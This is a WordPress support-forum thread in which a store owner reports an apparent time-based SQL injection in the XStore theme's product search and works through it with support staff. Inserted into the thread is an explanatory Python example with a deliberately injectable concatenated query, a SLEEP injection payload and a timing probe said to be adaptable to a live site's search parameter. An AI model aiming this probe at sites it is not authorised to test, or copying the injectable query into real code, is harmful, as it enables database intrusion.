Potential SQL Injection Vulnerability – Search Functionality

This topic has 9 replies, 2 voices, and was last updated 3 weeks, 1 day ago by Andrew Mitchell

    Downlore
    Participant
    February 16, 2026 at 19:08

    Hello XStore Support Team,

    I hope you are doing well.

    I am currently using the latest version of XStore Core, and all plugins and WordPress core are fully updated. However, I am still experiencing what appears to be a potential SQL injection issue related to the product search functionality.

    When testing certain search parameters, I noticed abnormal database behavior that may indicate improper handling of user input. Specifically, when performing a time-based SQL injection test (using a SLEEP function), the website response is noticeably delayed, which suggests that the injected query may be reaching the database layer.

    The issue persists even after updating to the most recent version of XStore Core.

    Could you please confirm:

    Whether there are any known SQL injection vulnerabilities related to the search functionality.

    If there are additional security patches or configuration steps required.

    Whether this issue has already been addressed in a newer build or hotfix.

    I can provide further technical details, logs, or query outputs if needed.

    Thank you for your support, and I look forward to your response.

    Best regards,
    Mohamed Salih
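The post above describes a time-based test (a SLEEP payload in the search term) but not how to tell a real injected delay from a site that is merely slow. The following is an added example, not XStore, WooCommerce or WordPress code: it builds two local product searches, one that concatenates the term into the SQL text and one that binds it as a parameter, and runs the same timing probe against both. Assumptions, all labelled in the code: the search term is the WordPress `?s=` parameter wrapped in a LIKE pattern, the back end exposes MySQL's SLEEP() (SQLite has none, so one is registered purely to simulate it offline), the control term "shoe" and the two-row catalogue are constructed here, and the payload shape shown is one of several that would be tried.

```python
"""Time-based SQL injection probe with a local vulnerable/hardened pair.

Added example, not XStore or WooCommerce code. Assumed: the search term is
the ``?s=`` parameter placed inside a LIKE pattern, and the database exposes
SLEEP() as MySQL does. SQLite is used only so the example runs offline; a
SLEEP() that calls time.sleep() is registered to stand in for MySQL's.
"""
import sqlite3
import statistics
import time
from typing import Callable, Sequence

# A "sender" submits one search term and returns once the response is back.
Sender = Callable[[str], None]


def make_store(vulnerable: bool) -> Sender:
    """Build an in-memory product search. Rows are constructed sample data."""
    db = sqlite3.connect(":memory:")
    # Simulated MySQL SLEEP(): stalls, then returns 0 (assumption for offline use).
    db.create_function("SLEEP", 1, lambda s: time.sleep(float(s)) or 0)
    db.execute("CREATE TABLE products (name TEXT)")
    db.executemany("INSERT INTO products VALUES (?)", [("red shoe",), ("blue hat",)])

    def search(term: str) -> None:
        try:
            if vulnerable:
                # Concatenation: the term becomes part of the SQL text, so a
                # quote in it ends the literal and the rest is parsed as SQL.
                sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
                db.execute(sql).fetchall()
            else:
                # Placeholder binding: the term is data, never parsed as SQL.
                # LIKE wildcards are escaped so "%" cannot widen the match.
                like = "%" + term.replace("%", r"\%").replace("_", r"\_") + "%"
                db.execute("SELECT name FROM products WHERE name LIKE ? ESCAPE '\\'",
                           (like,)).fetchall()
        except sqlite3.Error:
            pass  # a syntax error is still a timed response, not a stall
    return search


def sleep_payload(seconds: float) -> str:
    """Close the LIKE literal, add the delay, comment out the remainder.
    One common shape (assumed); numeric or double-quoted contexts differ."""
    return f"' AND SLEEP({seconds})-- -"


def median_response_time(send: Sender, term: str, trials: int) -> float:
    samples = []
    for _ in range(trials):
        start = time.perf_counter()
        send(term)
        samples.append(time.perf_counter() - start)
    return statistics.median(samples)  # median damps one-off jitter


def time_based_sqli(send: Sender, delays: Sequence[float] = (3.0, 6.0),
                    trials: int = 3, tolerance: float = 0.8) -> bool:
    """True only if the stall tracks *each* requested delay.

    Comparing against a baseline term and demanding that the extra time scales
    with the SLEEP() argument is what separates a real injection from a search
    that is simply slow under load or for a large catalogue."""
    baseline = median_response_time(send, "shoe", trials)  # constructed control
    for d in delays:
        observed = median_response_time(send, sleep_payload(d), trials)
        if observed - baseline < tolerance * d:
            return False
    return True


if __name__ == "__main__":
    for label, vuln in (("concatenated", True), ("parameterised", False)):
        verdict = time_based_sqli(make_store(vuln), delays=(0.3, 0.6))
        print(f"{label}: {'injectable' if verdict else 'not injectable'}")
```

Against a live site, `make_store` is replaced by a function that performs the GET for `?s=<term>` and waits for the body; everything else stays the same. Two caveats when reading results: SLEEP() inside a WHERE clause runs once per row the engine evaluates, so a real stall is usually longer than the requested value (the check above only requires at least that value), and a single slow response is not evidence, which is why the probe insists on the delay scaling with the argument.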

    8 Answers
    Andrew Mitchell
    Support staff
    February 17, 2026 at 10:39

    Hello, Downlore,

    Please provide us with any additional information you have obtained as a result of the testing. We would also like to inform you that we are using all possible methods to filter search queries.

    Best regards,
    8Theme Team

    Downlore
    Participant
    February 17, 2026 at 18:41

    Hello XStore Support Team,

    I hope you are doing well.

    I am currently using the latest version of XStore Core. All plugins are fully updated, and my website is running the latest version of WordPress (6.9.1). Despite this, I am still experiencing what appears to be a potential SQL injection issue related to the product search functionality.

    When testing certain search parameters, I noticed abnormal database behavior that may indicate improper handling of user input. Specifically, when performing a time-based SQL injection test (using a SLEEP function), the website response is noticeably delayed, which suggests that the injected query may be reaching the database layer.

    The issue persists even after updating to the most recent version of XStore Core.

    Thank you for your support, and I look forward to your response.

    Best regards,

    Andrew Mitchell
    Support staff
    February 18, 2026 at 09:21

    Hello, Downlore,

    Thank you for providing the sample request. We have conducted tests and found that it does not work on our default installation and has no effect on the server response speed (please see the attached video). Kindly review any third-party plugins, as one of them might be affected.

    Best regards,
    8Theme Team

    Downlore
    Participant
    February 18, 2026 at 19:38

    Hello,
    After further testing, I can confirm that your plugin alone does not show the vulnerability.
    However, when I activate WooCommerce together with XStore Core, the issue appears and the SQL injection test starts working, causing the website to sleep (delayed response).
    When I deactivate WooCommerce, the website no longer sleeps and works normally.
    Since my website is an online store, WooCommerce is essential and cannot be removed. I need WooCommerce to keep the store functioning properly.
    Could you please investigate the compatibility between XStore Core and WooCommerce and advise on a fix?
    Thank you.

    Downlore
    Participant
    February 18, 2026 at 22:34

    I’ve done further testing and it seems the problem is related to your demo themes.

    I installed an external theme for testing and activated WooCommerce along with XStore Core. In this setup, the issue does not occur. The website works normally.

    However, when I switch to any of the demo themes provided with XStore, the problem appears, causing the website to sleep and the vulnerability to be exploitable.

    This indicates that the issue originates from the demo themes, not the plugin itself.

    Please advise on how this can be resolved, as I need WooCommerce active for my online store.

    Thank you.

    Andrew Mitchell
    Support staff
    February 19, 2026 at 09:40

    Hello, Downlore,

    Could you please provide temporary wp-admin and FTP access? We will check what can be done to help you.
    To grant WP-Admin access, please proceed to create a new user account with an administrator role through your WordPress Dashboard. Once the account is established, you may securely transmit the username and password to us via the Private Content section designated for this purpose.

    For FTP access, we require the following details: FTP host, FTP username, FTP password, FTP port, and FTP encryption type. If you need assistance in creating these credentials, please reach out to your hosting provider who will guide you through the process.

    Best Regards,
    8Theme’s Team

    Downlore
    Participant
    February 19, 2026 at 21:46

    Hello,

    Thank you for your response. I am currently preparing the WP-Admin and SFTP/FTP access details as requested. I will provide you with all the necessary credentials via the private content section very soon.

    Best regards,

    Andrew Mitchell
    Support staff
    February 20, 2026 at 14:09

    Hi,

    Ok. Please take your time.

    Best regards,
    The 8Theme Team
